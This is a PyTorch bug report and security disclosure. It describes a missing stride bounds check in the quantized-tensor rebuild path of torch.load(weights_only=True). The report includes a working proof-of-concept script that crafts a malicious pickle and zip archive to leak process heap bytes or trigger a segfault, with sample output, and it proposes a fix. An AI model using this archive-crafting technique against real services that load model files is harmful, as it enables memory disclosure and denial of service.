pytorch - weights_only=True returns quantized tensor with unchecked stride; downstream dequantize() reads attacker-chosen offset of process memory on torch 2.12.0

🐛 Describe the bug

Originally filed as GHSA-jg6j-8w4h-2pg2 on 2026-05-20. Per maintainer guidance ("not strictly a torch.load bug per security policy, but worth fixing anyway; please do not hesitate to report it publicly, PR is coming"), opening a public issue to track the fix and to make the technical detail searchable for downstream users.

Summary

On torch==2.12.0+cpu (latest on PyPI, released 2026-05-13), torch.load(..., weights_only=True) returns a quantized tensor whose stride can be arbitrarily large, with no bounds check against the underlying storage. The first operation that materializes the tensor's data (dequantize(), int_repr(), sum(), clone(), print) reads from attacker-chosen offsets inside libtorch's C++ code. If the offset lands in mapped memory, the read succeeds and process heap bytes are exposed through the returned tensor's contents. If it lands in unmapped memory, the Python process terminates with SIGSEGV.

A 797-byte attacker-controlled archive plus one ordinary downstream call is enough.

The non-quantized rebuild path (_rebuild_tensor_v2, _rebuild_tensor_v3) enforces the bounds check that the quantized path is missing; the asymmetry is the bug.

Details

_rebuild_qtensor is on the weights_only allow-list. Its body in torch/_utils.py:438 accepts attacker-controlled storage, storage_offset, size, and stride arguments:

# Excerpt from torch/_utils.py; "..." marks code elided in this report.
def _rebuild_qtensor(storage, storage_offset, size, stride, quantizer_params, requires_grad, backward_hooks):
    qscheme = quantizer_params[0]
    if qscheme == torch.per_tensor_affine:
        tensor = torch._empty_affine_quantized(size, scale=..., zero_point=..., dtype=storage.dtype, device=storage.device)
    elif qscheme in (torch.per_channel_affine, torch.per_channel_affine_float_qparams):
        tensor = torch._empty_per_channel_affine_quantized(size, scales=..., zero_points=..., axis=axis, dtype=..., device=...)
    ...
    # storage, storage_offset, size and stride all come from the pickle; nothing
    # here checks that this layout fits inside storage before set_ is called.
    tensor.set_(storage, storage_offset, size, stride)
    ...
    return tensor

For the non-quantized path, the equivalent set_ call (reached via _rebuild_tensor_v2 in the same file) starts from t = torch.empty((0,), dtype=storage.dtype, ...) and then calls t.set_(storage._untyped_storage, storage_offset, size, stride). The C++ implementation requires the storage to cover every addressable element, i.e. (storage_offset + 1 + sum((size[i]-1) * stride[i])) * element_size <= storage.nbytes for a non-empty tensor; when that does not hold it tries to grow the storage, which fails here because the loaded storage is not resizable. A _rebuild_tensor_v2 call with stride=(2**20, 1) and a 12-byte storage therefore raises RuntimeError: Trying to resize storage that is not resizable.
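Stated with symbols (o = storage_offset, n_i = size[i], s_i = stride[i], e = element_size, N = storage.nbytes), and counting the last addressed element explicitly (hence the + 1), the requirement for a non-empty tensor can be checked by hand against the reproducer's layout below: size (3, 4), offset 0, 1-byte quint8 elements, 12-byte storage. The contiguous stride (4, 1) fits exactly; both strides used in the reproducer overshoot by orders of magnitude.

```math
\begin{aligned}
&\Bigl(o + 1 + \textstyle\sum_i (n_i - 1)\,s_i\Bigr)\,e \le N \\
s = (4, 1):&\quad (0 + 1 + 2\cdot 4 + 3\cdot 1)\cdot 1 = 12 \le 12 \\
s = (2^{17}, 1):&\quad (0 + 1 + 2\cdot 2^{17} + 3\cdot 1)\cdot 1 = 262148 > 12 \\
s = (2^{20}, 1):&\quad (0 + 1 + 2\cdot 2^{20} + 3\cdot 1)\cdot 1 = 2097156 > 12
\end{aligned}
```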

The quantized path constructs the starting tensor with torch._empty_per_channel_affine_quantized(size, ...) rather than through the empty-shape path. The subsequent tensor.set_(storage, storage_offset, size, stride) proceeds without the same bounds check, so the returned tensor carries the attacker-chosen stride over a 12-byte storage. The next operation that walks the tensor's strided layout reads the byte at storage_addr + (storage_offset + i*stride[0] + j*stride[1]) * element_size for each index (i, j) in size. For i > 0 and a large stride[0], that address lies far outside the storage.
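A small pure-Python sketch (no torch needed) of the address arithmetic described above, using the reproducer's layout: size (3, 4), storage_offset 0, 1-byte quint8 elements, and a 12-byte storage. The helper names are hypothetical, and the sketch only models which byte offsets a strided walk would touch, not libtorch's actual kernel code.

```python
# Hypothetical helpers: model the byte offsets a 2-D strided walk reads,
# relative to the start of the storage.

def element_byte_offsets(size, stride, storage_offset, element_size):
    """Return {(i, j): byte offset from the storage base} for a 2-D tensor."""
    offsets = {}
    for i in range(size[0]):
        for j in range(size[1]):
            offsets[(i, j)] = (storage_offset + i * stride[0] + j * stride[1]) * element_size
    return offsets


def out_of_bounds(offsets, element_size, storage_nbytes):
    """Indices whose element does not fit entirely inside the storage."""
    return sorted(idx for idx, off in offsets.items() if off + element_size > storage_nbytes)


# Reproducer layout with the "info leak" stride.
offs = element_byte_offsets((3, 4), (2**17, 1), 0, 1)
print(offs[(1, 0)], offs[(2, 3)])
print(out_of_bounds(offs, 1, 12))
```

Only row 0 (offsets 0 to 3) lies inside the storage; rows 1 and 2 start 131072 and 262144 bytes past its base.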

The OOB read is observable through the tensor's contents. Per-channel affine dequantization computes (uint8_at_offset - zero_point[i]) * scale[i], which exposes the byte at the OOB offset to the caller. Because the attacker chooses scale[i] and zero_point[i], the byte value can be reconstructed exactly from the output. I verified this by reconstructing ASCII text fragments ("pack", "pyth", "meta", "/tmp" prefixes) from the dequantize output across multiple runs.
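A minimal pure-Python sketch of why the leak is exact: per-channel affine dequantization is an invertible map on each byte, so knowing a row's scale and zero point recovers the original uint8 values. The function names are hypothetical, and the sketch uses Python floats rather than the float32 arithmetic dequantize() actually performs; rounding to the nearest integer absorbs the small floating-point error for scales like the ones in the reproducer.

```python
def dequantize_row(raw_bytes, scale, zero_point):
    """Per-channel affine dequantization of one row: (q - zero_point) * scale."""
    return [(q - zero_point) * scale for q in raw_bytes]


def recover_bytes(values, scale, zero_point):
    """Invert the map: q = round(value / scale) + zero_point."""
    return [round(v / scale) + zero_point for v in values]


def to_ascii(byte_values):
    """Printable ASCII as-is, everything else as '.' (same rule as the reproducer)."""
    return "".join(chr(b) if 32 <= b < 127 else "." for b in byte_values)


# Row 1 of the reproducer uses scale=0.2, zero_point=1.
leaked = list(b"refg")  # stand-in for four out-of-bounds bytes
values = dequantize_row(leaked, 0.2, 1)
recovered = recover_bytes(values, 0.2, 1)
print(recovered, to_ascii(recovered))  # [114, 101, 102, 103] refg
```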

Reproducer

Setup:

python -m venv /tmp/v
/tmp/v/bin/pip install --index-url https://download.pytorch.org/whl/cpu torch==2.12.0

Self-contained. Constructs the malicious archive in memory; no filesystem writes, no network.

"""
Repro: weights_only=True returns a quantized tensor whose stride is
not bounds-checked against storage. dequantize() either leaks process
heap bytes through the output tensor (small stride) or terminates the
process with SIGSEGV (large stride).
"""
import io
import struct
import subprocess
import sys
import zipfile

import torch


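def pack_int(v):
    # Smallest pickle int opcode: BININT1 ("K") for 0..255, BININT ("J") for
    # signed 32-bit values, LONG1 ("\x8a") for anything larger.
    if 0 <= v < 256:
        return b"K" + bytes([v])
    if -2**31 <= v < 2**31:
        return b"J" + struct.pack("<i", v)
    bl = max(1, (abs(v).bit_length() + 8) // 8)
    return b"\x8a" + bytes([bl]) + v.to_bytes(bl, "little", signed=True)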


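def build_blob(stride_b):
    # Protocol-2 pickle that calls torch._utils._rebuild_qtensor(*args).
    # PROTO 2, GLOBAL _rebuild_qtensor, MARK (start of the argument tuple)
    parts = [b"\x80\x02", b"c", b"torch._utils\n_rebuild_qtensor\n", b"("]
    # storage: BINPERSID on ("storage", torch.QUInt8Storage, "0", "cpu", 12),
    # i.e. a 12-element quint8 storage backed by archive/data/0
    parts += [b"(", b"X", struct.pack("<i", 7), b"storage",
              b"c", b"torch\nQUInt8Storage\n",
              b"X", struct.pack("<i", 1), b"0",
              b"X", struct.pack("<i", 3), b"cpu",
              b"K", bytes([12]), b"t", b"Q"]
    # storage_offset=0, size=(3, 4), stride=(stride_b, 1): the unchecked stride
    parts += [b"K\x00", b"(K\x03K\x04t",
              b"(", pack_int(stride_b), b"K\x01", b"t"]
    # quantizer_params = (torch.per_channel_affine, [0.1, 0.2, 0.3], [0, 1, 2], 0):
    # one (scale, zero_point) pair per row along axis 0
    parts += [b"(", b"c", b"torch\nper_channel_affine\n",
              b"](",
              b"G", struct.pack(">d", 0.1),
              b"G", struct.pack(">d", 0.2),
              b"G", struct.pack(">d", 0.3),
              b"e",
              b"](", b"K\x00", b"K\x01", b"K\x02", b"e",
              b"K\x00", b"t"]
    # requires_grad=False (NEWFALSE), backward_hooks=OrderedDict(); then TUPLE
    # closes the argument tuple, REDUCE calls _rebuild_qtensor, STOP
    parts += [b"\x89",
              b"c", b"collections\nOrderedDict\n)R",
              b"t", b"R", b"."]
    pkl = b"".join(parts)
    buf = io.BytesIO()
    # Wrap the pickle in a torch.save-style zip archive; archive/data/0 holds
    # the 12 storage bytes 0x00..0x0b
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("archive/data.pkl", pkl)
        zf.writestr("archive/data/0", bytes(range(12)))
        zf.writestr("archive/version", b"3\n")
        zf.writestr("archive/.format_version", b"1\n")
        zf.writestr("archive/byteorder", b"little")
    return buf.getvalue()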


print(f"torch {torch.__version__}", flush=True)

# Variant 1: info leak. stride small enough that the OOB offset lands in
# mapped process memory.
blob = build_blob(stride_b=2**17)
print(f"\n=== INFO LEAK (stride=2**17, {len(blob)} bytes) ===", flush=True)
r = torch.load(io.BytesIO(blob), weights_only=True)
print(f"shape={tuple(r.shape)} stride={r.stride()} storage_nbytes={r.untyped_storage().nbytes()}", flush=True)
out = r.dequantize().tolist()
print(f"row 0 (in-bounds, expected ~ [0, 0.1, 0.2, 0.3]): {out[0]}", flush=True)
print(f"row 1 (OOB read from heap): {out[1]}", flush=True)
print(f"row 2 (OOB read from heap): {out[2]}", flush=True)
# Reconstruct: out[1][j] = (uint8 - 1) * 0.2  (row 1 has scale=0.2, zero_point=1)
row1_bytes = [round(v / 0.2 + 1) for v in out[1]]
row1_ascii = "".join(chr(b) if 32 <= b < 127 else "." for b in row1_bytes)
print(f"row 1 reconstructed bytes: {row1_bytes} ASCII={row1_ascii!r}", flush=True)

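# Variant 2: SIGSEGV. Stride large enough (1 MiB) that the OOB offset lands in
# unmapped memory; run in a subprocess so the crash does not kill this script.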
blob = build_blob(stride_b=2**20)
print(f"\n=== SIGSEGV (stride=2**20, {len(blob)} bytes) ===", flush=True)
p = subprocess.run(
    [sys.executable, "-c",
     "import io,sys,torch; r=torch.load(io.BytesIO(sys.stdin.buffer.read()), weights_only=True); r.dequantize()"],
    input=blob, capture_output=True)
print(f"exit code: {p.returncode}  (negative = signal; -11 = SIGSEGV)", flush=True)

Expected output on a fresh pip install torch==2.12.0 venv (the leaked bytes vary across runs due to ASLR; the values shown were observed in my environment):

torch 2.12.0+cpu

=== INFO LEAK (stride=2**17, 797 bytes) ===
shape=(3, 4) stride=(131072, 1) storage_nbytes=12
row 0 (in-bounds, expected ~ [0, 0.1, 0.2, 0.3]): [0.0, 0.1, 0.2, 0.3]
row 1 (OOB read from heap): [22.6, 20.0, 20.4, 20.8]
row 2 (OOB read from heap): [-0.6, 50.7, 14.4, 56.7]
row 1 reconstructed bytes: [114, 101, 102, 103] ASCII='refg'

=== SIGSEGV (stride=2**20, 797 bytes) ===
exit code: -11

The four bytes [114, 101, 102, 103] decode to the ASCII string refg, a fragment of Python heap memory. Different runs expose different memory regions, including file path fragments ("/tmp"), Python identifier strings ("pack", "pyth", "meta"), and arbitrary heap pointers. The attacker chooses the OOB offset through stride[0] in the archive (the stride_b parameter of build_blob).
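The stride is an ordinary pickled tuple inside data.pkl, so the archive author controls it directly. A small sketch using only the standard pickle module shows how the reproducer's pack_int helper (copied verbatim so the snippet runs on its own) encodes the stride tuple (stride_b, 1), and that values well beyond the 32-bit range round-trip as well. The stride_fragment name is hypothetical; it builds only the tuple, not a full archive.

```python
import pickle
import struct


def pack_int(v):
    # Copied from the reproducer: BININT1 ("K") for 0..255, BININT ("J") for
    # signed 32-bit values, LONG1 ("\x8a") for anything larger.
    if 0 <= v < 256:
        return b"K" + bytes([v])
    if -2**31 <= v < 2**31:
        return b"J" + struct.pack("<i", v)
    bl = max(1, (abs(v).bit_length() + 8) // 8)
    return b"\x8a" + bytes([bl]) + v.to_bytes(bl, "little", signed=True)


def stride_fragment(stride_b):
    # MARK "(", two ints, TUPLE "t", STOP "." -> the tuple (stride_b, 1)
    return b"(" + pack_int(stride_b) + b"K\x01" + b"t" + b"."


for s in (2**17, 2**20, 2**40):
    frag = stride_fragment(s)
    print(frag, pickle.loads(frag))
```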

Expected behavior

Symmetric with the non-quantized rebuild path: the _rebuild_tensor_v2 equivalent with the same oversized stride raises RuntimeError: Trying to resize storage that is not resizable. The quantized path should reject the same input with an equivalent error.

Cross-version

Also reproduced on torch==2.7.1+cu118; the dense-vs-quantized asymmetry is the same in both versions tested. Affected: <= 2.12.0 (tested on 2.7.1 and 2.12.0).

I did not find a path to attacker-controlled writes. Quantized fill_, copy_, and index_put_ all reject the OOB-strided tensor at the setStorage boundary inside libtorch.

Suggested fix direction

Add to the quantized set_ path the same bounds check that the non-quantized path already enforces. For a non-empty tensor, the invariant (storage_offset + 1 + sum((size[i]-1) * stride[i])) * element_size <= storage.nbytes should hold regardless of the tensor's quantization state. Alternatively, validate size, stride, and storage_offset inside _rebuild_qtensor itself before calling tensor.set_(storage, storage_offset, size, stride).
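A minimal sketch of the second option, written as a standalone pure-Python check rather than an actual patch to torch/_utils.py. The helper name check_qtensor_storage_bounds and its parameters are hypothetical. It applies the invariant counting the last element (hence the + 1), rejects negative values, and assumes a tensor with any zero-sized dimension needs no storage.

```python
def check_qtensor_storage_bounds(size, stride, storage_offset, element_size, storage_nbytes):
    """Hypothetical pre-set_ validation for _rebuild_qtensor.

    Raises RuntimeError if the (size, stride, storage_offset) layout would
    address bytes outside a storage of storage_nbytes bytes.
    """
    if len(size) != len(stride):
        raise RuntimeError(f"size {tuple(size)} and stride {tuple(stride)} differ in length")
    if storage_offset < 0 or any(s < 0 for s in stride) or any(n < 0 for n in size):
        raise RuntimeError("negative size, stride, or storage_offset")
    if any(n == 0 for n in size):
        return  # empty tensor: no element is ever read
    # Highest element index reachable, counted from the start of the storage.
    last = storage_offset + sum((n - 1) * s for n, s in zip(size, stride))
    required = (last + 1) * element_size
    if required > storage_nbytes:
        raise RuntimeError(
            f"sizes {tuple(size)}, strides {tuple(stride)}, storage offset {storage_offset} "
            f"require {required} bytes but storage has {storage_nbytes}"
        )


# Reproducer layout: the contiguous stride fits exactly, the malicious one does not.
check_qtensor_storage_bounds((3, 4), (4, 1), 0, 1, 12)
try:
    check_qtensor_storage_bounds((3, 4), (2**20, 1), 0, 1, 12)
except RuntimeError as e:
    print(e)  # sizes (3, 4), strides (1048576, 1), storage offset 0 require 2097156 bytes but storage has 12
```

Inside _rebuild_qtensor such a check would run just before tensor.set_(...), fed from the storage argument (for example its element_size() and nbytes()); that call site is an assumption, not something the current code does.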

Versions tested: 2.7.1+cu118, 2.12.0+cpu.

Versions

Collecting environment information...
PyTorch version: 2.12.0+cpu
Is debug build: False
CUDA used to build PyTorch: None
ROCM used to build PyTorch: N/A

OS: Ubuntu 22.04.5 LTS (x86_64)
GCC version: (Ubuntu 11.4.0-1ubuntu1~22.04.3) 11.4.0
Clang version: 14.0.0-1ubuntu1.1
CMake version: version 3.22.1
Libc version: glibc-2.35

Python version: 3.10.12 (main, Mar 3 2026, 11:56:32) [GCC 11.4.0] (64-bit runtime)
Python platform: Linux-6.8.0-90-generic-x86_64-with-glibc2.35
Is CUDA available: False
CUDA runtime version: No CUDA
CUDA_MODULE_LOADING set to: N/A
GPU models and configuration: No CUDA
Nvidia driver version: No CUDA
cuDNN version: No CUDA
Is XPU available: False
HIP runtime version: N/A
MIOpen runtime version: N/A
Is XNNPACK available: True
Caching allocator config: N/A

CPU:
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
Address sizes: 48 bits physical, 48 bits virtual
Byte Order: Little Endian
CPU(s): 12
On-line CPU(s) list: 0-11
Vendor ID: AuthenticAMD
Model name: AMD Ryzen 5 5600X 6-Core Processor
CPU family: 25
Model: 33
Thread(s) per core: 2
Core(s) per socket: 6
Socket(s): 1
Stepping: 0
Frequency boost: enabled
CPU max MHz: 3700.0000
CPU min MHz: 2200.0000
BogoMIPS: 7399.86
L1d cache: 192 KiB (6 instances)
L1i cache: 192 KiB (6 instances)
L2 cache: 3 MiB (6 instances)
L3 cache: 32 MiB (1 instance)
NUMA node(s): 1
NUMA node0 CPU(s): 0-11

Versions of relevant libraries:
[pip3] numpy==2.2.6
[pip3] torch==2.12.0+cpu
[conda] Could not collect

cc @mruberry @mikaylagawarecki
